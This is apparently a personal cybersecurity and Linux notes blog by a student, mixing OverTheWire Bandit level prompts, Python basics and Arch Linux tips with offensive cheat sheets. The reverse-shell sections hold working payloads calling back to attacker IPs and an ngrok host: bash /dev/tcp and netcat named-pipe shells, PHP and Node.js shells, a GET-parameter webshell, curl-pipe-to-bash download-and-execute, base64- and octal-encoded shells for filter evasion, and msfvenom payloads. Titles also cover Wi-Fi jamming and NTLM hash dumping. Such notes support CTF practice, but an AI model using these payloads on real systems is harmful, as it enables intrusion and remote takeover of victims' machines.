Gajendra Mahato

Bandit: Level 0 => Level 1

Wed, 01 Jan 2020 00:00:00 +0000

The goal of this level is to log into the game using SSH. 

Bandit: Level 1 => Level 2

Thu, 02 Jan 2020 00:00:00 +0000

The password for the next level is stored in a file called `-` located in the home directory.

Bandit: Level 2 => Level 3

Fri, 03 Jan 2020 00:00:00 +0000

The password for the next level is stored in a file called `spaces in this filename` located in the home directory.

Bandit: Level 3 => Level 4

Sat, 04 Jan 2020 00:00:00 +0000

The password for the next level is stored in a hidden file in the `inhere` directory.

Bandit: Level 4 => Level 5

Sun, 05 Jan 2020 00:00:00 +0000

The password for the next level is stored in the only human-readable file in the `inhere` directory. Tip: if your terminal is messed up, try the “reset” command.

Bandit: Level 5 => Level 6

Mon, 06 Jan 2020 00:00:00 +0000

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties:

Bandit: Level 6 => Level 7

Tue, 07 Jan 2020 00:00:00 +0000

The password for the next level is stored somewhere on the server and has all of the following properties:

Bandit: Level 7 => Level 8

Wed, 08 Jan 2020 00:00:00 +0000

The password for the next level is stored in the file `data.txt` next to the word `millionth`

Bandit: Level 8 => Level 9

Thu, 09 Jan 2020 00:00:00 +0000

The password for the next level is stored in the file `data.txt` and is the only line of text that occurs only once.

Bandit: Level 9 => Level 10

Fri, 10 Jan 2020 00:00:00 +0000

The password for the next level is stored in the file `data.txt` in one of the few human-readable strings, preceded by several `=` characters.

Bandit: Level 10 => Level 11

Sat, 11 Jan 2020 00:00:00 +0000

The password for the next level is stored in the file `data.txt`, which contains `base64` encoded data.

Bandit: Level 11 => Level 12

Sun, 12 Jan 2020 00:00:00 +0000

The password for the next level is stored in the file `data.txt`, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions.

Bandit: Level 12 => Level 13

Mon, 13 Jan 2020 00:00:00 +0000

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work. Use mkdir with a hard to guess directory name. Or better, use the command “mktemp -d”. Then copy the datafile using cp, and rename it using mv (read the manpages!)

Bandit: Level 13 => Level 14

Tue, 14 Jan 2020 00:00:00 +0000

The password for the next level is stored in `/etc/bandit_pass/bandit14` and can only be read by user `bandit14`. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. **Note:** `localhost` is a hostname that refers to the machine you are working on.

Bandit: Level 14 => Level 15

Wed, 15 Jan 2020 00:00:00 +0000

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

Bandit: Level 15 => Level 16

Thu, 16 Jan 2020 00:00:00 +0000

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.

Bandit: Level 16 => Level 17

Fri, 17 Jan 2020 00:00:00 +0000

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

Bandit: Level 17 => Level 18

Sat, 18 Jan 2020 00:00:00 +0000

There are 2 files in the homedirectory: `passwords.old and passwords.new`. The password for the next level is in `passwords.new` and is the only line that has been changed between `passwords.old and passwords.new`

Bandit: Level 18 => Level 19

Sun, 19 Jan 2020 00:00:00 +0000

The password for the next level is stored in a file `readme` in the homedirectory. Unfortunately, someone has modified `.bashrc` to log you out when you log in with SSH.

Bandit: Level 19 => Level 20

Mon, 20 Jan 2020 00:00:00 +0000

To gain access to the next level, you should use the `setuid` binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place `(/etc/bandit_pass)`, after you have used the setuid binary.

Bandit: Level 20 => Level 21

Tue, 21 Jan 2020 00:00:00 +0000

There is a setuid `binary` in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level `bandit20`. If the password is correct, it will transmit the password for the next level `bandit21`.

Bandit: Level 21 => Level 22

Wed, 22 Jan 2020 00:00:00 +0000

A program is running automatically at regular intervals from `cron`, the time-based job scheduler. Look in `/etc/cron.d/` for the configuration and see what command is being executed.

Bandit: Level 22 => Level 23

Thu, 23 Jan 2020 00:00:00 +0000

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Bandit: Level 23 => Level 24

Fri, 24 Jan 2020 00:00:00 +0000

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Bandit: Level 24 => Level 25

Sat, 25 Jan 2020 00:00:00 +0000

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pin code. There is no way to retrieve the pin code except by going through all the 10000 combinations, called brute-forcing.

Bandit: Level 25 => Level 26

Sun, 26 Jan 2020 00:00:00 +0000

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

Bandit: Level 26 => Level 27

Mon, 27 Jan 2020 00:00:00 +0000

Good job getting a shell! Now hurry and grab the password for `bandit27`!

Bandit: Level 27 => Level 28

Tue, 28 Jan 2020 00:00:00 +0000

There is a git repository at `ssh://bandit27-git@localhost/home/bandit27-git/repo` via the port `2220`. The password for the user `bandit27-git` is the same as for the user `bandit27`. Clone the repository and find the password for the next level.

Bandit: Level 28 => Level 29

Wed, 29 Jan 2020 00:00:00 +0000

There is a git repository at `ssh://bandit28-git@localhost/home/bandit28-git/repo` via the port `2220`. The password for the user `bandit28-git` is the same as for the user `bandit28`.

Bandit: Level 29 => Level 30

Thu, 30 Jan 2020 00:00:00 +0000

There is a git repository at `ssh://bandit29-git@localhost/home/bandit29-git/repo` via the port `2220`. The password for the user `bandit29-git` is the same as for the user `bandit29`.

Bandit: Level 30 => Level 31

Fri, 31 Jan 2020 00:00:00 +0000

There is a git repository at `ssh://bandit30-git@localhost/home/bandit30-git/repo` via the port `2220`. The password for the user `bandit30-git` is the same as for the user `bandit30`.

Bandit: Level 31 => Level 32

Sat, 01 Feb 2020 00:00:00 +0000

There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo via the port 2220. The password for the user bandit31-git is the same as for the user bandit31.

Bandit: Level 32 => Level 33

Sun, 02 Feb 2020 00:00:00 +0000

After all this git stuff, it’s time for another escape. Good luck!

📑 Bandit: Level 33 => Level 34

Mon, 03 Feb 2020 00:00:00 +0000

At this moment, level 34 does not exist.

✅ `floor()`

Tue, 13 Jan 2026 00:00:00 +0000

Returns the nearest whole number less than or equal to the given number.

import math

math.floor(3.5) # 3 
math.floor(3.9) # 3 
math.floor(-3.5) # -4 
math.floor(-2.8) # -3

✅ `trunc()`

Cuts off the decimal part and moves the number towards zero.

math.trunc(2.8) # 2 
math.trunc(-2.8) # -2

🔁 Number Conversion

➤ Binary

bin(2) # '0b10' 
int('10', 2) # 2

➤ Octal

oct(64) # '0o100' 
int('100', 8) # 64

➤ Hexadecimal

hex(64) # '0x40' 
int('40', 16) # 64

🔢 Decimal

Used for exact decimal values (like money).

✅ String Basics in Python

Tue, 13 Jan 2026 00:00:00 +0000

chai = "Masala Chai"

print(chai[0:6]) # Masala → gets characters from index 0 to 5
print(chai.lower()) # masala chai → converts all to small letters
print(chai.upper()) # MASALA CHAI → converts all to capital letters
print(chai.strip()) # Masala Chai → removes space from start and end only
print(chai.replace("Masala", "Lemon")) # Lemon Chai → replaces word
print(chai.find("Chai")) # 7 → shows starting index of word
print(chai.count("Chai")) # 1 → counts how many times word appears

✅ `split()` – splits string into list

chai_list = "Lemon, Ginger, Masala, Mint"

print(chai_list.split()) # ['Lemon,', 'Ginger,', 'Masala,', 'Mint'] → split by space (default)
print(chai_list.split(", ")) # ['Lemon', 'Ginger', 'Masala', 'Mint'] → split by comma + space

✅ String Slicing

num = "0123456789"

num[:] # '0123456789' → full string
num[3:] # '3456789' → from index 3 to end
num[:7] # '0123456' → from start to index 6
num[0:7:2] # '0246' → step 2 from index 0 to 6
num[0:7:3] # '036' → step 3 from index 0 to 6

✅ String Formatting

chai_type = "Masala"
quantity = 2

statement = "I ordered {} cups of {} chai"
print(statement.format(quantity, chai_type))
# Output: I ordered 2 cups of Masala chai

🎵 How to Use Jockie Music Bot. 🎶

Tue, 13 Jan 2026 00:00:00 +0000

Brute Force Login Page with Hydra

Tue, 13 Jan 2026 00:00:00 +0000

Bypassing `disable_functions` in PHP for Reverse Shell Using Chankro

Tue, 13 Jan 2026 00:00:00 +0000

Sometimes system, exec, shell_exec, and other dangerous PHP functions are disabled. Chankro helps us bypass these by using LD_PRELOAD and custom shared objects.

🧠 Step-by-Step Guide

🔍 1. Identify Target Architecture

Access the phpinfo.php page on the target.
Look for architecture info:
- Architecture => x86_64 → 64-bit
- Architecture => i686 or i386 → 32-bit

💣 2. Create Shell Script

Prepare a Bash reverse shell in a file named shell:

echo "bash -c 'exec bash -i >& /dev/tcp/10.10.14.5/9001 0>&1'" > shell

⚙️ 3. Install Chankro

If not installed:

Chisel Port Forwarding Guide

Tue, 13 Jan 2026 00:00:00 +0000

Clang Format Configurations for C-family Languages (C, C++, etc)

Tue, 13 Jan 2026 00:00:00 +0000

Configuring DHCP Server to Assign Hostname via DHCP

Tue, 13 Jan 2026 00:00:00 +0000

This guide explains how to configure the DHCP server to assign a hostname to a client.

Downloading Files from Linux to Windows Using Windows CLI

Tue, 13 Jan 2026 00:00:00 +0000

Dumping NTLM Hashes via Non-Interactive Shell (Windows)

Tue, 13 Jan 2026 00:00:00 +0000

Easy Guide to Fixing GRUB on Garuda/Arch Linux in BTRFS File System

Tue, 13 Jan 2026 00:00:00 +0000

This simple guide helps you fix the GRUB bootloader on Garuda Linux with a BTRFS file system. Follow these steps to install the necessary tools, mount partitions, fix GRUB, and check EFI entries.

FFUF - Fuzz Faster U Fool

Tue, 13 Jan 2026 00:00:00 +0000

File Inclusion Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

File Inclusion and Path Traversal

At a Glance

File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed.

There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1

File Sharing Over SMB Using `smbserver.py`

Tue, 13 Jan 2026 00:00:00 +0000

File Transfer Over SSH Using `scp`

Tue, 13 Jan 2026 00:00:00 +0000

File Transfer Using Netcat

Tue, 13 Jan 2026 00:00:00 +0000

File Transfer via FTP on Linux

Tue, 13 Jan 2026 00:00:00 +0000

Generating Reverse Shells with Metasploit's msfvenom.

Tue, 13 Jan 2026 00:00:00 +0000

Note: Always remember to use the same payload in msfconsole as you used to generate in msfvenom.

Linux Reverse Shell (extension doesn’t matter for Linux)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf

Payload Type: Shell Reverse TCP Suitable for: Linux systems, Netcat listener required.

Windows x64 Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe

Payload Type: Windows x64 Meterpreter Reverse TCP Suitable for: 64-bit Windows systems, spawns a Meterpreter session.

HTTP Status Code

Tue, 13 Jan 2026 00:00:00 +0000

These codes indicate that the request was successfully received, understood, and accepted.

200 OK: The request was successful.
201 Created: The request was successful, and a resource was created.
202 Accepted: The request has been accepted but not yet processed.
204 No Content: The request was successful, but there is no content to send back.

3xx: Redirection

These codes indicate that further action is needed to complete the request.

301 Moved Permanently: The resource has been permanently moved to a new URL.

IDA Debugger Key Notes (Default)

Tue, 13 Jan 2026 00:00:00 +0000

Jamming Wi-Fi with `mdk4`

Tue, 13 Jan 2026 00:00:00 +0000

JavaScript Reverse Shell & Command Execution Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

Useful JavaScript snippets for remote command execution, reverse shells, and post-exploitation via Node.js or vulnerable eval() injection.

📄 Basic Reverse Shell using `child_process.exec()`

require('child_process').exec('nc 0.tcp.in.ngrok.io 18402 -e /bin/sh')

📌 Listener on attacker side:

nc -lvnp 18402

📄 Spawn a shell via `spawn()` method

require('child_process').spawn('/bin/sh', [])

This spawns an interactive shell on the server if injected.

📄 Execute a simple Linux command

require('child_process').exec('ls -la', function(error, stdout, stderr) {
 console.log(stdout)
})

📄 Download and execute a script (e.g., reverse shell script)

require('child_process').exec('curl http://10.10.14.5/rev.sh | bash')

📄 Reverse shell using `bash` and TCP

require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/9001 0>&1')

💡 Use this when nc -e is restricted or not available.

Kali Distrobox Persistent Config

Tue, 13 Jan 2026 00:00:00 +0000

Kali Docker Persistent Container

Tue, 13 Jan 2026 00:00:00 +0000

Merge `dev` brach into `stable` branch in git

Tue, 13 Jan 2026 00:00:00 +0000

Metasploit Practical Guide (for Beginners and CTF use)

Tue, 13 Jan 2026 00:00:00 +0000

Object Types / Data Types

Tue, 13 Jan 2026 00:00:00 +0000

Number: 1234, 3.1415, 3+4j, 0b1111, Decimal(), Fraction()
Examples of numbers, including integers, floats, complex, binary, Decimal, and Fraction.
String: 'spam', "Bob's", b'a\x01c', u'sp\xc4m' Examples of strings, including regular, byte, and unicode strings.
List: [1, [2, 'three'], 4.5], list(range(10)) List examples, including nested lists and lists generated from a range.
Tuple: (1, 'spam', 4, 'U'), tuple('spam'), namedtuple Examples of tuples, including a basic tuple, a tuple from a string, and namedtuple.

Persistent MAC Address Spoofing (Global + Per-Connection) by QwenAi

Tue, 13 Jan 2026 00:00:00 +0000

by QwenAI | Verified on Arch Linux + NetworkManager ≥ 1.18

✅ Goal:

Apply the same spoofed MAC to all Wi-Fi connections (global).

Optionally set a custom DHCP hostname per network (e.g., Galaxy-A06 instead of Nix).
🔧 Why it works: Uses NM’s native cloned-mac-address and dhcp-hostname — no race conditions, no leaks.

🔧 1. Global MAC Spoofing (All Wi-Fi)

Step 1: Create policy file

sudo mkdir -p /etc/NetworkManager/conf.d/
sudo tee /etc/NetworkManager/conf.d/99-global-mac-address.conf <<'EOF'
[keyfile]
unmanaged-devices=

[connection-wifi]
# Global default for *all* Wi-Fi connections
wifi.cloned-mac-address=DE:AD:BE:EF:CA:FE
EOF

📝 Replace DE:AD:BE:EF:CA:FE with your desired MAC (e.g., 90:01:C0:DE:13:37).

PHP Reverse Shell & Webshell Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios.

1. Basic Webshell Using `system()`

<?php system($_GET['cmd']); ?>

Usage: Execute commands by passing cmd parameter in URL.
Example: http://target.com/webshell.php?cmd=ls

2. PHP Reverse Shell Using One-liner with `fsockopen()`

php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");'

Run this on target if you can execute PHP code directly.
Connects back to your listener on port 3232.

3. PHP Reverse Shell Using Named Pipe & Netcat

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?>

Uses a named pipe (/tmp/f) for stable reverse shell.
Requires nc (Netcat) on the target machine.

4. PHP One-liner Bash Reverse Shell (Backgrounded)

<?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?>

Runs bash reverse shell in the background.
Useful to keep shell persistent after HTTP request ends.

🔥 Tips & Notes

Replace IP and ports with your attacker machine’s IP and desired port.
Use nc -lvnp <port> on your machine to catch the reverse shell.
Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()).
If nc is not installed on the target, try pure PHP or bash based shells.
Always check if the web server user has permissions to execute commands or create named pipes.
Combine these shells with Chankro or php-reverse-shell for better evasion.

Pipewire Audio Server with Equalizer support in Arch Linux

Tue, 13 Jan 2026 00:00:00 +0000

paru -S easyeffects lsp-plugins

Python Reverse Shell Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

This cheat sheet shows useful Python reverse shell one-liners and a PowerShell reverse shell generator in Python.

RCE via LFI wrappers in PHP

Tue, 13 Jan 2026 00:00:00 +0000

Reading a File in Redis-CLI Interactive Shell

Tue, 13 Jan 2026 00:00:00 +0000

Reverse Engineering notes with GDB (pwndbg)

Tue, 13 Jan 2026 00:00:00 +0000

Reverse Shell

Tue, 13 Jan 2026 00:00:00 +0000

Reverse Shell

Reverse Shell Payloads for bash

Tue, 13 Jan 2026 00:00:00 +0000

bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Reverse Shell Payload with Encoded Command

bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash

bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}

Best way to escape bad character (Recommended)

echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh
curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh'
bash$IFS'/tmp/revshell.sh'

Reverse Shell by using octal escape sequences

Generating RevShell (escape sequence)

echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'

echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g'

Generating RevShell (Hex escape sequence)

 echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g'

Executing RevShell (Never forgot to URL encode if you are sending via HTTP/s method)

printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh

Additional Shell Options and Tools

Don’t forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility:

Rules for Kali Linux facebook group

Tue, 13 Jan 2026 00:00:00 +0000

RunasCs.exe revshell

Tue, 13 Jan 2026 00:00:00 +0000

Saving the Current Pane Buffer in tmux

Tue, 13 Jan 2026 00:00:00 +0000

This guide explains how to save the contents of the current pane in tmux to a file.

Step-by-Step Instructions

Capture the Pane’s Content:
- Press prefix key Ctrl+b to enter tmux command mode.
- Type :capture-pane -S - -E - and press Enter. This captures the entire visible contents of the current pane to a buffer.
Save the Buffer to a File:
- Press prefix key Ctrl+b again to enter tmux command mode.
- Type :save-buffer /tmp/pane_output.log and press Enter. This saves the buffer content to a file named /tmp/pane_output.log.

Combined Command Method

You can capture the pane’s content and save it to a file using the following commands in your shell within the tmux session:

Scanning `rpcbind` on the Network

Tue, 13 Jan 2026 00:00:00 +0000

Set Default Terminal in Gnome Desktop Environment

Tue, 13 Jan 2026 00:00:00 +0000

gsettings set org.gnome.desktop.default-applications.terminal exec tilix
gsettings set org.gnome.desktop.default-applications.terminal exec-arg -x
gsettings set org.gnome.desktop.default-applications.terminal exec-arg --quake

Spoofing MAC Address in a Persistent fashion

Tue, 13 Jan 2026 00:00:00 +0000

This method allows users to change their WiFi adapter's MAC address persistently. It also enables users to bypass MAC address blacklisting by network owners, as it allows connection to WiFi networks with a spoofed MAC address.

SQL Injection Vulnerability Exploration Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

String Manipulation in Perl with s///, y///, and s///g

Tue, 13 Jan 2026 00:00:00 +0000

Switch Back to PulseAudio server in Arch Linux

Tue, 13 Jan 2026 00:00:00 +0000

Title: Disable Pipewire Audio Service

To disable the Pipewire audio service, run the following commands:

systemctl --user disable pipewire pipewire.socket
systemctl --user mask pipewire pipewire.socket
systemctl --user enable --now pulseaudio.service

Uninstalling Pipewire

To uninstall Pipewire, you can use the following command:

paru -Rdd pipewire-pulse pipewire-support pipewire-alsa

Installing Pulseaudio

To install Pulseaudio, run:

paru -S pulseaudio-alsa pulseaudio-bluetooth pulseaudio-equalizer-ladspa pulseaudio-jack pulseaudio-lirc pulseaudio

To extrack hash from private.asc file

Tue, 13 Jan 2026 00:00:00 +0000

Wi-Fi Handshake Capture Guide using aircrack-ng Tools

Tue, 13 Jan 2026 00:00:00 +0000

Wi-Fi Interface management Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

Airmon-ng

To start monitoring mode on wlan0:

sudo airmon-ng start wlan0

iwconfig

To enable monitor mode using iwconfig:

sudo ifconfig [INTERFACE] down
sudo iwconfig [INTERFACE] mode monitor
sudo ifconfig [INTERFACE] up

iw

To enable monitor mode using iw:

sudo ip link set [INTERFACE] down
sudo iw [INTERFACE] set monitor control
sudo ip link set [INTERFACE] up

Adding a New Monitor Interface

To add a new monitor interface:

sudo iw [INTERFACE] interface add [NEW_INTERFACE] type monitor

Aircrack-ng Installation

To install aircrack-ng:

sudo apt-get update
sudo apt-get install aircrack-ng

Airmon-ng Commands

To use airmon-ng commands:

XSS File Stealing Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

XSS Payload Cheat Sheet

Tue, 13 Jan 2026 00:00:00 +0000

Configure Custom DNS Servers in Arch based Linux.

Sat, 13 Jan 2024 00:00:00 +0000

This guide explains how to configure custom DNS servers in Arch based Linux.

About Me

Mon, 01 Jan 0001 00:00:00 +0000

Hello Guys, my name is Gajendra Mahato

I am a Computer Science Student based in Nepal.

🚀 My Interests

I explore and write about:

Linux
Cybersecurity

🛠️ Skills & Tools

Networking
Cybersecurity
Linux
git

📫 Connect with me

If you like my work or want to collaborate, feel free to reach out!

Contact

Mon, 01 Jan 0001 00:00:00 +0000

📬 Get in Touch

I am always open to discussing new projects, creative ideas, or reading your writeups.

📍 Find me here

Email: sudogajendra@gmail.com
LinkedIn: Gajendra Mahato

💬 Send a Message

(Optional: You can embed a Google Form or use a service like Formspree here)

Portfolio

Mon, 01 Jan 0001 00:00:00 +0000

Portfolio of Gajendra Mahato

Gajendra Mahato

Bandit: Level 0 => Level 1

Bandit: Level 1 => Level 2

Bandit: Level 2 => Level 3

Bandit: Level 3 => Level 4

Bandit: Level 4 => Level 5

Bandit: Level 5 => Level 6

Bandit: Level 6 => Level 7

Bandit: Level 7 => Level 8

Bandit: Level 8 => Level 9

Bandit: Level 9 => Level 10

Bandit: Level 10 => Level 11

Bandit: Level 11 => Level 12

Bandit: Level 12 => Level 13

Bandit: Level 13 => Level 14

Bandit: Level 14 => Level 15

Bandit: Level 15 => Level 16

Bandit: Level 16 => Level 17

Bandit: Level 17 => Level 18

Bandit: Level 18 => Level 19

Bandit: Level 19 => Level 20

Bandit: Level 20 => Level 21

Bandit: Level 21 => Level 22

Bandit: Level 22 => Level 23

Bandit: Level 23 => Level 24

Bandit: Level 24 => Level 25

Bandit: Level 25 => Level 26

Bandit: Level 26 => Level 27

Bandit: Level 27 => Level 28

Bandit: Level 28 => Level 29

Bandit: Level 29 => Level 30

Bandit: Level 30 => Level 31

Bandit: Level 31 => Level 32

Bandit: Level 32 => Level 33

📑 Bandit: Level 33 => Level 34

✅ `floor()`

✅ trunc()

🔁 Number Conversion

➤ Binary

➤ Octal

➤ Hexadecimal

🔢 Decimal

✅ String Basics in Python

✅ split() – splits string into list

✅ String Slicing

✅ String Formatting

🎵 How to Use Jockie Music Bot. 🎶

Brute Force Login Page with Hydra

Bypassing `disable_functions` in PHP for Reverse Shell Using Chankro

🧠 Step-by-Step Guide

🔍 1. Identify Target Architecture

💣 2. Create Shell Script

⚙️ 3. Install Chankro

Chisel Port Forwarding Guide

Clang Format Configurations for C-family Languages (C, C++, etc)

Configuring DHCP Server to Assign Hostname via DHCP

Downloading Files from Linux to Windows Using Windows CLI

Dumping NTLM Hashes via Non-Interactive Shell (Windows)

Easy Guide to Fixing GRUB on Garuda/Arch Linux in BTRFS File System

FFUF - Fuzz Faster U Fool

File Inclusion Cheat Sheet

File Inclusion and Path Traversal

At a Glance

File Sharing Over SMB Using `smbserver.py`

File Transfer Over SSH Using `scp`

File Transfer Using Netcat

File Transfer via FTP on Linux

Generating Reverse Shells with Metasploit's msfvenom.

Linux Reverse Shell (extension doesn’t matter for Linux)

Windows x64 Reverse Shell

HTTP Status Code

3xx: Redirection

IDA Debugger Key Notes (Default)

Jamming Wi-Fi with `mdk4`

JavaScript Reverse Shell & Command Execution Cheat Sheet

📄 Basic Reverse Shell using child_process.exec()

📌 Listener on attacker side:

📄 Spawn a shell via spawn() method

📄 Execute a simple Linux command

📄 Download and execute a script (e.g., reverse shell script)

✅ `trunc()`

✅ `split()` – splits string into list

📄 Basic Reverse Shell using `child_process.exec()`

📄 Spawn a shell via `spawn()` method

📄 Reverse shell using `bash` and TCP

1. Basic Webshell Using `system()`

2. PHP Reverse Shell Using One-liner with `fsockopen()`